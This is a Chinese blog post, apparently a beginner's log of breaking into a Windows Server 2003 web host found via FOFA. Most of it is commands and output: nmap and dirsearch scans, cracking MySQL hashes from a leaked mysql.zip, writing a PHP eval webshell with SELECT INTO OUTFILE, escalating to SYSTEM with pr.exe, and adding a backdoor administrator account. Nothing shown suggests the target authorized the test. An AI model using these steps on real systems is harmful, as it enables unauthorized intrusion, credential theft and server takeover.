操作记录
1、使用fofa找到目标
http://xxx.com/
2、使用nmap对目标扫描看跑了哪些服务和端口及服务器操作系统
nmap -sT -T4 -sV -O xxx.com -v
结果:
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
80/tcp open http Microsoft IIS httpd
1027/tcp open msrpc Microsoft Windows RPC
2000/tcp open tcpwrapped
3306/tcp open mysql MySQL 5.0.18-nt-max
3389/tcp open ms-wbt-server Microsoft Terminal Service
5060/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|media device
Running (JUST GUESSING): Microsoft Windows 2003|XP|PocketPC/CE|Vista (94%), Motorola embedded (86%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_ce:5 cpe:/o:microsoft:windows_ce:5.0 cpe:/h:motorola:vip1216 cpe:/o:microsoft:windows_vista::sp1
后面从phpinfo()中确认了是一台windows server 2003
3、使用dirsearch工具扫描目标站点目录,就是这里发现mysql.zip文件、info.php、/phpmyadmin/登陆页面敏感信息
4、下载解压mysql.zip文件
发现root密码等mysql帐号和密码
其中有帐号密码的是mysql目录下的user.MYD文件,直接以txt打开
直接打开www.md5.com解密
5、判断目标站点网站的root目录
访问网站http://xxx.com/info.php,如下是php.ini的路径。
当我们在浏览器中输入:http://xxx.com/info.php就出现phpinfo()页面,那么就说明
D:\ftp_main\Localuser\webadmin\
就是这个站点的根路径,这个很重要,一句话木马写在里面的。
5、登陆目标站点mysql后台,看能不能写入webshell的一句话木马
(1)看mysql有没有权限
show variables like "%secure%";
结果:
secure_auth oFF
AI给解释:secure_auth 变量显示为 OFF,这意味着 MySQL 允许使用不安全的身份验证方法。为了提高安全性,建议将其设置为 ON。
(2)第4步中知道了网站根路径后,那么我们就写一句话木马到这个根目录下
select "<?php @eval($_POST['X']);?>" INTO OUTFILE "D:\\ftp_main\\Localuser\\webadmin\\ts2.php"
6、使用webshell连接。
7、提权
(1)
输入命令
systeminfo
是windows server 2003企业版本
(2)、在使用pr.exe文件先执行一段命令查看目标服务器有没有打过相关补丁
systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type C:\Windows\Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\temp.txt
(3)通过github下载pr.exe文件上传到这台服务器,pr.exe专门用于提权。
(4)、执行命令
没有提权时
D:\ftp_main\Localuser\webadmin\img\sitemap\> whoami
nt authority\network service
提权后
D:\ftp_main\Localuser\webadmin\img\sitemap\> pr.exe "whoami"
/xxoo/-->Build&&Change By p
/xxoo/-->This exploit gives you a Local System shell
/xxoo/-->Got WMI process Pid: 1528
begin to try
/xxoo/-->Found token SYSTEM
/xxoo/-->Command:whoami
nt authority\system
(5)、查看windows 上的帐号
D:\ftp_main\Localuser\webadmin\img\newmain\> pr.exe "net user"
/xxoo/-->Build&&Change By p
/xxoo/-->This exploit gives you a Local System shell
/xxoo/-->Got WMI process Pid: 3668
begin to try
/xxoo/-->Found token SYSTEM
/xxoo/-->Command:net user
\\俊 措茄 荤侩磊 拌沥
-------------------------------------------------------------------------------
Administrator ASPNET Guest
hocen_test IUSR_290D9EF85B47484 IWAM_290D9EF85B47484
nuri SUPPORT_388945a0 webadmin
work01 work02 WOUTempAdmin
疙飞捞 窍唱 捞惑狼 坷幅肺 肯丰登菌嚼聪促.
(6)、添加一个work02帐号、添加到administrator组中
D:\ftp_main\Localuser\webadmin\img\newmain\> pr.exe "net user work02 P@ssw0rd1qaz /add"
D:\ftp_main\Localuser\webadmin\img\newmain\> pr.exe "net localgroup administrators work02 /add"
D:\ftp_main\Localuser\webadmin\img\newmain\> net user
(7)手工输入mstsc命令登陆测试
成功登陆的。
(8)删除这个work02帐号
D:\ftp_main\Localuser\webadmin\img\newmain\> pr.exe "net user work02 /del"
D:\ftp_main\Localuser\webadmin\img\newmain\> net user
\\290D9EF85B47484俊 措茄 荤侩磊 拌沥
-------------------------------------------------------------------------------
Administrator ASPNET Guest
hocen_test IUSR_290D9EF85B47484 IWAM_290D9EF85B47484
nuri SUPPORT_388945a0 webadmin
work01 WOUTempAdmin
疙飞阑 肋 角青沁嚼聪促.
hocen_test IUSR_290D9EF85B47484 IWAM_290D9EF85B47484
nuri SUPPORT_388945a0 webadmin
work01 WOUTempAdmin
疙飞阑 肋 角青沁嚼聪促.
8、总结:这次渗透主要是运气好,通过dirsearch直接发现mysql.zip文件,然后登陆后台数据库,直接写入webshell,对于刚学渗透小白来说,也是一成功经验。
知识点:dirsearch工具的使用、mysql写入webshell方法、windows常用命令。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
